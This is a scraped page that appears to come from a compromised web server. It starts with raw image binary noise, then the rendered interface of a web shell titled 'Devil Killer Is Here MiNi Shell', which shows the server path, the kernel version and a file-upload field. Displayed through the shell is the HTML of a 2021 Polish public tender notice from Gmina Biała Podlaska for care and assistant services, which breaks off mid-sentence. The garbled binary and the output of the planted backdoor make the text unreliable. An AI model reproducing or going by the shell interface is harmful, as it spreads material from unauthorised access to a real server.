JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210729/0013145101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00131451 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> "Usługi społeczne w Gminie Biała Podlaska”- świadczenie usług opiekuńczych i asystenckich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Biała Podlaska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 030237397</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prosta 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biała Podlaska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">83-8889-221</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">83-8889-200</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gmina-bialapodlaska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gmina-bialapodlaska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "Usługi społeczne w Gminie Biała Podlaska”- świadczenie usług opiekuńczych i asystenckich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3992f662-f04e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00131451</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00103222/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 „Usługi społeczne w Gminie Biała Podlaska”- świadczenie usług opiekuńczych i asystenckich</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> RPO WL na lata 2014-2020,w ramach Osi Priorytetowej:11 Włączenie społeczne Działanie 11.2 Usługi społeczne i zdrowotne. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-bialapodlaska.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminabiala-podlaska.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami. Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem https://gmina-bialapodlaska.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu. Zamawiający wskazuje informacje, o których mowa w Rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych,dotyczące systemu dostępnego pod adresem https://gmina-bialapodlaska.ezamawiajacy.pl:• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox,<br/>Google Chrome lub MS Edge• Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1)	Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu; dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „ Usługi społeczne w Gminie Biała Podlaska”- świadczenie usług opiekuńczych i asystenckich prowadzonym w trybie podstawowym bez negocjacji;<br/>2)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o jawność postępowania (między innymi art. 18, art. 74, art. 252 art. 260 Ustawy). <br/>3)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Okresy wskazane powyżej mogą zostać przedłużone do czasu upływu okresu przedawnienia ewentualnych roszczeń, jeśli przetwarzanie danych osobowych będzie niezbędne do dochodzenia lub obrony przed takimi roszczeniami lub jeżeli przetwarzanie jest niezbędne na podstawie innych przepisów prawa. <br/>4)	Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisanych Ustawy związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>5)	Przysługują Pani/Panu następujące prawa związane z przetwarzaniem danych osobowych:<br/>1) prawo dostępu do Pani/Pana danych osobowych;<br/>2) prawo żądania sprostowania Pani/Pana danych osobowych zgodnie z art. 16 RODO, jednak skorzystacie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą;<br/>3) prawo żądania usunięcia Pani/Pana danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej;<br/>4) prawo żądania ograniczenia przetwarzania Pani/Pana danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>6)	Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>7)	Dane osobowe nie będą przekazywane do państw trzecich ani organizacji międzynarodowych. Dane osobowe nie będą służyły profilowaniu, w tym zautomatyzowanemu podejmowaniu decyzji. <br/>Zamawiający dodatkowo informuje, że obowiązek stosowania przepisów RODO spoczywa także na Wykonawcy, co oznacza, że wykonawca jest zobowiązany spełnić obowiązek informacyjny, o którym mowa w art. 13 lub 14 RODO, w stosunku do osób trzecich, których dane osobowe Wykonawca pozyskuje w celu przekazania ich Zamawiającemu w ofertach lub innych dokumentach w postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZP.271.1.19.2021.RW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 182336 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety społecznej</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa opiekuńcza świadczona na rzecz minimum 7 podopiecznych ok. 84h/ na miesiąc tj. łączna liczba godzin do realizacji 1848 h od dnia podpisania umowy do 31.05.2023 r. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 48787,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Dot. Części I-III zamówienia:<br/>1. Nazwa kryterium (C) cena Znaczenie kryterium (w pkt) -60<br/>C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60%<br/><br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług opiekuńczych przez opiekuna), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi opiekuńcze, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług opiekuńczych. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania<br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej- 35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco: waga max. 5 pkt.<br/>za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 pkt;<br/>za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia– 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska, zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej<br/><br/>dot.Części IV zamówienia:<br/>1.Nazwa kryterium cena (C)	Znaczenie kryterium (w pkt) - 60<br/><br/> C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60<br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług asystenckich przez asystenta), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi asystenckie, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług o asystenckich. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania:<br/><br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej-35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco:- waga max. 5 pkt.<br/>1)	za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 pkt;<br/>2)	za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia – 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa opiekuńcza świadczona na rzecz minimum 7 podopiecznych ok. 84h/ na miesiąc tj. łączna liczba godzin do realizacji 1848 h od dnia podpisania umowy do 31.05.2023 r. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 48787,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Dot. Części I-III zamówienia:<br/>1. Nazwa kryterium (C) cena Znaczenie kryterium (w pkt) -60<br/>C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60%<br/><br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług opiekuńczych przez opiekuna), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi opiekuńcze, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług opiekuńczych. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania<br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej- 35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco: waga max. 5 pkt.<br/>za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 pkt;<br/>za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia– 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska, zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej<br/><br/>dot.Części IV zamówienia:<br/>1.Nazwa kryterium cena (C)	Znaczenie kryterium (w pkt) - 60<br/><br/> C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60<br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług asystenckich przez asystenta), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi asystenckie, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług o asystenckich. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania:<br/><br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej-35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco:- waga max. 5 pkt.<br/>1)	za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 